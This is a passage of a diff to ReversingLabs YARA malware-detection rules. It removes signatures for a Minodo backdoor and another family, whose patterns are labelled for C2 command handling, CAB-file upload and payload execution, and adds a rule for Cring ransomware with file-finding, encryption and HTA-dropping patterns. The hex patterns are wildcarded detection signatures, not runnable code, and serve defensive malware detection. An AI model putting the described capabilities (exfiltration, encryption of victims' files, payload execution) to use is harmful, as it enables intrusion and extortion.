-            ?? ?? ?? ?? 4D 8D 87 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 33 C9 49 8B CC 48 89 5C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74
+		$encrypt_files_p1 = {
+            59 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 F1 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ??
+            51 E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 89 D6 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ??
+            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? FF 04 24 51 57 E8 ?? ?? ?? ?? 58 59 8D 8C
+            24 ?? ?? ?? ?? 8D 54 24 ?? 57 E8 ?? ?? ?? ?? 58 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ??
+            ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 8D 84 24 ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 31 C0 C7 44 24 ?? ?? ?? ?? ?? 40 89
+            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 59 89 D6 B9 ?? ?? ?? ?? 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 59 5A 89 F9 89 C3
+            E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 6A ?? 59 8D 7C 24 ?? 8D B4 24 ?? ?? ?? ?? F3
+            A5 6A ?? 59 8D BC 24 ?? ?? ?? ?? 8D 74 24 ?? 31 C0 F3 A5 E9 ?? ?? ?? ?? 8B 84 24 ??
+            ?? ?? ?? 85 C0 74 ?? 8B 8C 24 ?? ?? ?? ?? 50 FF 11 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B
+            70 ?? 8B 78 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 89 C1 89 F2 57 E8 ?? ?? ?? ??
+            58 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 69
         }
-		$create_cab_file_and_upload_p4 = {
-            8B 44 24 ?? 48 8D 15 ?? ?? ?? ?? 4D 8B CD 41 B8 ?? ?? ?? ?? 48 8B CF 89 44 24 ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 45 33 C9 45 33
-            C0 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ??
-            ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? FF C0 B9 ?? ?? ?? ?? 8B
-            D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48
-            8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B
-            CE FF 15 ?? ?? ?? ?? 83 C8 ?? EB ?? 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 44
-            8B 44 24 ?? 4C 8D 4C 24 ?? 49 8B D5 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15
-            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
-            45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B
-            CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 8B C3 4C 8B B4 24 ?? ?? ?? ?? 4C 8B
-            AC 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5C 5F 5E 5D C3
+		$encrypt_files_p2 = {
+            7B ?? ?? ?? ?? ?? 89 C6 83 C6 ?? 85 FF 74 ?? 83 7E ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ??
+            ?? ?? 58 81 C6 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 74 ?? 83 3E ?? 74 ??
+            8D 4E ?? E8 ?? ?? ?? ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 8B 06 F0 FF 08 75 ?? 56
+            E8 ?? ?? ?? ?? EB ?? 53 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? 85 C9 74 ??
+            8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59
+            6B 5B ?? ?? 89 C7 89 C6 83 C7 ?? 85 DB 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 83 7E ?? ?? 74
+            ?? 57 E8 ?? ?? ?? ?? 58 83 3F ?? 74 ?? 8D 47 ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58
+            83 C6 ?? 83 C7 ?? 83 C3 ?? EB ?? 8D 84 24 ?? ?? ?? ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ??
+            ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D B4 24
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 6B 7E ?? ?? 89 C1 85 FF 74 ?? 8D 59 ?? 83 C1 ?? E8
+            ?? ?? ?? ?? 89 D9 83 C7 ?? 8D 5C 24 ?? EB ?? 56 53 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ??
+            85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 A1 ?? ?? ?? ?? 8B 00 83 F8 ??
+            72 ?? 89 E0 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 C6 89 D7 68 ?? ?? ?? ?? 8D 44
+            24 ?? 50 E8 ?? ?? ?? ?? 59 59 89 B4 24 ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ??
+            ?? ?? ?? 89 94 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 58 89 44 24 ?? 83 64 24
+            ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 83 C7 ?? 8D 4E ?? E8 ??
+            ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 66 ?? ?? 89 F9 E8 ?? ?? ?? ?? 8D 65 ?? 5E 5F 5B 5D
+            C3
         }
-		$cmd_expand_payload_p1 = {
-            40 53 55 41 55 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
-            ?? ?? 48 8B E9 48 8D 8C 24 ?? ?? ?? ?? 45 33 ED 33 D2 41 B8 ?? ?? ?? ?? 66 44 89 AC
-            24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 44
-            89 AC 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 45 8D 45 ?? 48 8D 4C 24 ?? 33 D2 44 89 6C 24 ??
-            E8 ?? ?? ?? ?? 33 C0 4C 89 6C 24 ?? 45 8D 45 ?? 45 33 C9 BA ?? ?? ?? ?? 48 8B CD C7
-            44 24 ?? ?? ?? ?? ?? 4C 89 6C 24 ?? 48 89 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 45 33 C9 33
-            D2 48 8B C8 45 8D 41 ?? 4C 89 6C 24 ?? 48 89 BC 24 ?? ?? ?? ?? 44 89 6C 24 ?? FF 15
-            ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ??
-            ?? 45 33 C9 45 33 C0 48 8B C8 41 8D 51 ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 6C 24 ?? FF
-            15 ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ??
-            ?? ?? 4C 8D 40 ?? 48 8D 84 24 ?? ?? ?? ?? 41 83 C9 ?? 33 D2 33 C9 C7 44 24 ?? ?? ??
-            ?? ?? 48 89 44 24 ?? 4C 89 A4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
-            33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+		$drop_hta_file_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 89 D3 89 F9 89
+            C2 53 E8 ?? ?? ?? ?? 58 8D B4 24 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 58 31 DB 43 53 57 E8 ?? ?? ?? ?? 59
+            5A 53 89 DF 50 E8 ?? ?? ?? ?? 59 5A 8D 5C 24 ?? 89 C2 89 D9 56 E8 ?? ?? ?? ?? 58 39
+            3B 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ??
+            ?? F2 0F 11 44 24 ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 89
+            84 24 ?? ?? ?? ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 40 89
+            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ??
+            ?? EB ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            8D BC 24 ?? ?? ?? ?? 57 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F1 E8 ??
+            ?? ?? ?? 57 E8 ?? ?? ?? ?? 58 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A
         }
-		$cmd_expand_payload_p2 = {
-            44 8B 66 ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ??
-            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
-            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 8B CD BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24
-            ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 4C
-            89 6C 24 ?? 4C 89 6C 24 ?? 45 33 C0 33 C9 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 66 44 89 AC 24 ?? ?? 00 00 44 89 6C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C8
-            ?? EB ?? 90 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 4C 89 6C 24 ?? 48 8D 0D ?? ??
-            ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CB
-            FF 15 ?? ?? ?? ?? 41 8B C4 4C 8B A4 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B BC
-            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            41 5D 5D 5B C3
+		$drop_hta_file_p2 = {
+            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58
+            31 DB 43 53 56 E8 ?? ?? ?? ?? 59 5A 53 50 E8 ?? ?? ?? ?? 59 5A 8D 74 24 ?? 89 C2 89
+            F1 57 E8 ?? ?? ?? ?? 58 39 1E 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D
+            74 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            89 54 24 ?? 40 89 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89
+            84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 44 24 ?? 89 44 24 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 74 24 ?? 56 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 89 D9 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59
+            8D BC 24 ?? ?? ?? ?? 89 C3 89 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 F9 6A ?? E8 ?? ??
+            ?? ?? 58 83 64 24 ?? ?? 83 64 24 ?? ?? 57 E8 ?? ?? ?? ?? 59 8D 4C 24 ?? 51 56 6A ??
+            68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 53 E8
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( all of ( $cmd_expand_payload_p* ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $drop_hta_file_p* ) )
 }
-rule REVERSINGLABS_Win32_Backdoor_Minodo : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cring : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Minodo backdoor."
+		description = "Yara rule that detects Cring ransomware."
 		author = "ReversingLabs"
-		id = "0eeff863-1a46-5b25-8780-5cd887e3b1e2"
-		date = "2023-06-07"
-		modified = "2023-06-07"
+		id = "76530a6d-145b-5316-8200-4b191d0754fd"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.Minodo.yara#L1-L110"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Cring.yara#L1-L66"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "807408699fe00c8d1170598050e533dd0d79bb170f2538b6b6227cda7410060b"
+		logic_hash = "05cf60ad39c9dcc592345f13b63c99b153b9253297a8ad9e52e0439081d8c796"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Minodo"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cring"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$generate_system_id = {
-            40 55 53 56 57 41 56 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B F1 48 8D 55 ?? 48 8D
-            4D ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 DB 85 C0 75 ?? 66 C7 45 ?? ?? ?? 4C
-            8D 45 ?? 48 8D 55 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 66 C7 45 ?? ?? ?? 48 83 4D ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? 8B CB 48 8B D3 BE ?? ??
-            ?? ?? 48 85 D2 7E ?? 44 8A 54 15 ?? EB ?? 44 8A 95 ?? ?? ?? ?? 41 8A 01 49 FF C1 48
-            FF C2 32 44 15 ?? 41 32 C2 41 32 00 49 FF C0 88 44 15 ?? 41 38 19 75 ?? 83 C9 ?? 4C
-            8D 4D ?? 41 38 18 75 ?? 83 C9 ?? 4C 8D 45 ?? 48 3B D6 75 ?? 83 C9 ?? 48 8B D3 83 F9
-            ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 48 8D 5D ?? 49 8B FE 44
-            0F B6 03 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 83 C7 ?? 48 FF C3 48 FF CE 75 ??
-            FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 8B D8 FF 15 ?? ?? ?? ?? 48 8D 55
-            ?? 44 8B CB 4D 8B C6 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5E 5F 5E 5B
-            5D C3
-        }
-		$generate_encrypt_and_send_key = {
-            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 48 89 78 ?? 41 56 48 81 EC ?? ?? ?? ??
-            8B F2 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 40 ?? 48 8B 08 8B 09
-            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 45 33 C0 45 8D 70 ?? 41 8D 50 ?? 41 8B CE E8
-            ?? ?? ?? ?? 48 8B D8 83 F8 ?? 74 ?? 41 8D 6E ?? 48 8D 44 24 ?? 8B CD C6 00 ?? 48 FF
-            C0 48 FF C9 75 ?? 0F B7 CE 66 44 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B CF 66 89 44 24 ??
-            E8 ?? ?? ?? ?? 48 63 FB 48 8D 54 24 ?? 48 8B CF 44 8B C5 89 44 24 ?? E8 ?? ?? ?? ??
-            85 C0 74 ?? 48 8B CF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? BE ?? ?? ??
-            ?? 48 8B CD 8B D6 E8 ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 33 C9 8A 44 29 ?? 48 FF C9 88
-            44 0C ?? 48 FF CE 75 ?? 8D 56 ?? 44 8D 46 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CF
-            8B F0 85 C0 74 ?? 48 8D 54 24 ?? 45 33 C9 44 8B C0 E8 ?? ?? ?? ?? 3B C6 74 ?? 48 8B
-            CF E8 ?? ?? ?? ?? 33 DB 8B C3 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 6B ?? 49 8B
-            73 ?? 49 8B 7B ?? 49 8B E3 41 5E C3
-        }
-		$get_encrypt_and_send_system_info = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ??
-            8B F1 48 8B CA 48 8B DA FF 15 ?? ?? ?? ?? C6 44 24 ?? ?? 48 63 F8 40 88 7C 24 ?? 4C
-            8B C7 85 C0 74 ?? 48 8D 44 24 ?? 48 2B D8 48 8D 4C 24 ?? 49 FF C8 4A 8D 0C 01 8A 04
-            0B 88 01 75 ?? 83 C7 ?? 48 63 DF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? F6 D8 48 8D 45 ?? 1A
-            C9 80 E1 ?? 80 C9 ?? FF C7 88 4C 1C ?? 8B CA C6 00 ?? 48 FF C0 48 FF C9 75 ?? 48 8D
-            4D ?? 89 55 ?? FF 15 ?? ?? ?? ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 63
-            CF FF C7 BB ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48
-            63 CF FF C7 4C 8D 85 ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 D7 88 44 14 ?? 8B 45 ??
-            FF C7 48 63 D7 8D 4B ?? C6 44 24 ?? ?? 89 44 14 ?? 48 8D 54 24 ?? 83 C7 ?? 89 9D ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C0 8D 48 ?? 03 CF
-            48 63 D1 48 83 FA ?? 76 ?? 44 8D 43 ?? 44 2B C7 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88
-            44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B
-            CA 48 FF C9 41 8A 04 09 88 01 48 FF CA 75 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
-            03 F8 C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
-            ?? ?? 44 8B C0 8D 48 ?? 03 CF 48 63 D1 48 83 FA ?? 76 ?? 41 B8 ?? ?? ?? ?? 44 2B C7
-            48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74
-            ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B CA 48 FF C9 42 8A 04 09 88 01 48 FF CA 75 ?? 4C
-            8D 4C 24 ?? 48 8D 54 24 ?? 44 03 C7 8B CE E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49
-            8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3
+		$find_files_p1 = {
+            28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ??
+            18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F
+            ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A
         }
-		$copy_payload_into_allocated_memory = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 56 57 41 56 48 83 EC ?? 49 8B D8 48 63 F2 48 8B F9 41
-            C6 00 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 66 C7 03 ?? ?? B8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ??
-            8B E8 85 C0 74 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D6 33 C9 4C 8B F6 FF 15
-            ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 66 C7 03 ?? ?? FF 15 ?? ?? ?? ?? 89 43 ?? 8D 46
-            ?? EB ?? 4D 8B C6 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 83 64 24 ?? ??
-            4C 8D 04 2E 45 33 C9 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 8B 44
-            24 ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 48 83 C4 ?? 41 5E 5F 5E C3
+		$find_files_p2 = {
+            02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 16 0A DD ??
+            ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C
+            ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ??
+            9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ??
+            ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69
+            32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ??
+            ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ??
+            ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ??
+            ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28
+            ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ??
+            ?? ?? ?? DC 06 2A
         }
-		$execute_payload_from_temp = {
-            40 53 48 81 EC ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C 8B D1 48 8D 44 24 ?? 41 8B D0 33 DB
-            88 18 48 FF C0 48 FF CA 75 ?? 48 8D 44 24 ?? 8D 4A ?? 88 18 48 FF C0 48 FF C9 75 ??
-            48 8D 44 24 ?? 44 89 44 24 ?? 45 33 C9 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C0 48 89
-            44 24 ?? 48 89 5C 24 ?? 48 89 5C 24 ?? 49 8B D2 89 5C 24 ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 89 5C 24 ?? 66 89 9C 24 ?? ?? 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C
